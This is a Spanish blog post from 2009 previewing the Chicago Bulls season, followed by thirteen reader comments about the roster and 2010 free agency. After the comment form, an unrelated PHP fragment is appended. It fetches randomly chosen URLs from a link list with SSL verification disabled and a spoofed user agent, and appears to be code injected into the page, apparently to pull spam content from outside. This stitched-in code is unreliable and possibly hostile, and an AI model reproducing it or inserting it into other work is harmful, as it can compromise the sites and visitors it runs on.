Chicago Bulls: No me llames iluso…

07 de October de 2009 por Viva_Dirk

…porque tenga una ilusión. Así dice la canción y así deben pensar los aficionados de los Bulls, que tras la increíble primera ronda que protagonizó su equipo en los pasados play-offs esperan que se mantenga el nivel o que incluso se suba un poquito.

Por fin disponen los de Illinois de un jugador franquicia desde que se fuera “Su Majestad”. Derrick Rose se ganó este honor a lo largo de toda la temporada, pero sobre todo en los play-offs donde promedió 20 puntos, 6 rebotes  y 6 asistencias en los 7 partidos contra Boston, con el mejor defensor en el puesto de base de la liga enfrente. Rose es la esperanza y el motor de este equipo porque, a parte de sus virtudes baloncestísticas, es de carácter serio y extremadamente competitivo, un jugador capaz de cambiar el rumbo de una franquicia. Por su parte, Kirk Hinrich es posiblemente el mejor base suplente de la liga. No cabe duda de que su contrato de casi 9 millones al año fue firmado para ser un base titular de garantías pero la llegada de Rose le ha condenado al banquillo para completar minutos de base y escolta. No sería nada raro que intentasen traspasarlo a mitad de temporada.

En el puesto de escolta encontramos el vacío dejado por Ben Gordon, máximo anotador del equipo la campaña pasada. John Salmons, que ha demostrado sobradamente su nivel pero que no es ni tan explosivo ni tan “caliente” como Gordon, se presenta como el acompañante de Rose en el juego exterior. Para rellenar parte del hueco ha llegado después de su aventura europea el microondas Jannero Pargo, acostumbrado a salir desde el banco y ejercer de líder anotador. Su función se intuye clave para que Chicago no pierda fuelle.

Luol Deng ha sido la gran decepción de los Bulls desde que en la 06-07 firmara 19 puntos y 7 rebotes por noche que la valieron para cerrar un mega contrato de 12 millones por temporada. Si Deng vuelve a ser el alero potente y resolutivo cerca del aro que fue ese año podríamos ver a los Bulls entre los cuatro primeros del Este. Si sigue con problemas físicos y jugando como el año pasado, va a ser demasiado para Rose y cía.

El juego interior se repartirá entre Noah, Thomas y Miller. Noah explotó en la serie contra Boston donde jugó casi 40 minutos por encuentro y promedió 10 puntos, 13 rebotes y 2 tapones. Su intensidad y trabajo cada segundo que pasa dentro de la pista unido a su movilidad y conocimiento del juego le convierten en el socio deseado de cualquier estrella. Thomas parece haber encontrado un lugar cómodo para sus cualidades. Junto a Noah o Miller puede explotar su capacidad atletica tanto en ataque como en defensa a la vez que va puliendo un tiro de media distancia interesante. Con 23 años recién cumplidos parece haber encontrado cierta madurez en su juego. Brad Miller completa un trío muy complementario. Mientras Noah pone la intensidad y Tyrus el físico, Miller es una cabeza pensante dentro de la zona capaz de repartir más de 3 asistencias en 27 minutos de juego a la vez que exprime su tiro y carga con faltas a los pívots menos expertos. Aaron Gray, una vez vuelva de su lesión, jugará tan sólo minutos residuales.

Las elecciones en el draft fueron James Johnson y Taj Gibson. El primero es un alero calcado a Luol Deng, fuerte físicamente, buen reboteador e irregular tirador exterior, que podría tener sus minutos ante cualquier lesión del sudanés. Gibson es un ala-pívot cumplidor pero la rotación interior está mas que completa. Parece que habrían encajado mejor otros jugadores a los que dejaron pasar como Wayne Ellington y que en caso de elegir un interior debería haber sido DeJuan Blair o BJ Mullens, pero ninguna de estas elecciones habría influido demasiado en esta temporada.

Quinteto: Rose-Salmons-Deng-Thomas-Noah
Sexto hombre:
Brad Miller

Pronóstico: 1ª ronda mínimo

Comenta

13 comentarios a esta entrada

  1. M dice:
    #1

    ¿Y Rose de escolta dejando a Hinrich de base?. Yo lo veo más natural así, quizá porque Hinrich me parece un jugador más “europeo” para el puesto de base. Me parecería una dupla muy interesante.

      Citar

  2. kantonyo dice:
    #2

    A mi me gustan bastante las elecciones del draft de Chicago. James Johnson tiene muy buena pinta, demostró gran caracter en Wake Forest, cuando el equipo se derrumbó a finales de temporada, el fue el único que siguió jugando a gran nivel, no como Jeff Teague o Aminu que desaparecieron en la postseason. Aunque es verdad que todo apuntaba a que escogerian un pívot como Mullens o incluso sonó Blair, de todas formas viendolo desde la distancia, hubiera sido muy arriesgado apostar por uno de estos dos, uno por estar muy verde todavia y el otro por sus lesiones.

    Da la sensación de que esta franquicia esta creciendo año tras año … le falta un empujón…. Dwyane Wade??? vendría de lujo!!!

    Si yo fuera Marc Gasol, tendría sueños humedos por jugar en este equipo….

    Se meteran casi seguro en Playoffs, y pueden poner las cosas dificiles al igual que el año pasado en segunda ronda.

      Citar

  3. kantonyo dice:
    #3

    Por cierto, yo no veo para nada a Derrick Rose de escolta. Mientras Hinrich aguante de suplente, es un lujo tener un segunda espada como él. No tiene porque ser negativo el tener dos bases de este potencial, todo lo contrario.

      Citar

  4. pcerezo dice:
    #4

    No sé como andan de hueco salarial para el 2010 pero tal como dice Kantoyo puede ser un buen refugio para una estrella que quiera competir a nivel alto.

    Rose es un portento como base y no le veo de escolta, su tiro no es bueno. Hinrich se ha quedado en una cosa indeterminada, no sabes a que atenerte con él (base, escolta, escolta, base…).

    Veremos si lo de Noah no fueron fuegos de artificio en la eliminatoria con Celtics y fue de verdad progresión, tengo mis dudas que pueda fajarse con los cuatros del Oeste (Gasol, Nowitzki, Duncan…).

    Estoy de acuerdo en lo de Marc, puede ser un buen sitio para él, “Quindici” Del Negro parece un buen entrenador (vive y deja vivir).

    Estoy de acuerdo con Viva_Dirk que la clave está en Luol Deng, es un jugador All-Star o es un jugador más?

    Un saludo,
    Pablo

    P.D.: joder con la preguntita…

      Citar

  5. Txusma dice:
    #5

    Considerando que este temporada acaban contrato Brad Miller, Tim Thomas y Jerome James, los Bulls tienen bastante hueco para fichar el proximo verano.
    Parece ser que el año de los Bulls es el 2010.

      Citar

  6. Viva_Dirk dice:
    #6

    No se si tiene para un contrato por el máximo que supongo saldrá a 18 millones por año, pero si creo que puede terminar de cerrar el equipo con la incorporación de un escolta, Joe Johnson ya ha declarado que va a salir al mercado, me parece un jugador perfecto. Aunque un anotador interior también es prioritario.

      Citar

  7. Landrusski dice:
    #7

    Para mie ste año van a luxar por final de conferencia y va a ser un hueso muy pero ke muuuy duro de roer…si fichan a wade en 2010 pelotazo…y claros favoritos por mucho que lebron fiche por new york

      Citar

  8. Txusma dice:
    #8

    Creo q mejor q Wade (q teniendo a Rose, para q?) lo suyo seria pillar a Amare o Bosh y si cabe un Michael Redd baratito, pues para dentro (me voy encargando la camiseta… jejeje)

      Citar

  9. pcerezo dice:
    #9

    Txusma,

    Amare y Bosh, jugadores bajo sospecha?
    Lo de Joe Johnson les vendría de perlas y si consiguen a Marc Gasol tú me diras: Rose, Johnson, Luol Deng, Noah, Gasol es un quinteto muy bueno y en el banquillo Hinrich, Salmons, Thomas, Miller…muy buena plantilla.

    Creo que sería más competitivo y sin fuegos de artificio.

    Pablo

      Citar

  10. Txusma dice:
    #10

    Evidentemente no le haria ascos al equipo que comentas aunque la dupla Noah-Gasol, sin ser mala, no la acabo de ver al nivel necesario para optar al anillo. Amare y Bosh estaran bajo sospecha ahora pero esperemos a ver como acaba esta temporada.

      Citar

  11. Viva_Dirk dice:
    #11

    Si Chicago se gasta 18 kilos al año en alguien, tiene toda la pinta de que sera en Bosh, salvo que Toronto haga una gran temporada. Con esos 18 kilos, los Bulls se pondrian en 48 millones, renunciando a la mid-level tendrian para otro contrato de 12 millones, para mi Joe Johnson sería el jugador perfecto.

      Citar

  12. pcerezo dice:
    #12

    Tienes razón, Noah-Gasol no garantiza título. Otra opción puede ser buscar a Bosh-Amare y buscar un trade para Noah, no lo veo lo de este chico (lo mismo me tengo que comer mis palabras), pero no lo veo.

    Pablo

      Citar

  13. Jabho dice:
    #13

    Creo que harán un buen año pero por dentro no tienen lo suficiente para competir al máximo y por fuera echaran de menos a Ben Gordon y su capacidad de anotación. Además a ver como responde Deng….

    Play Offs si, pero sin más.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>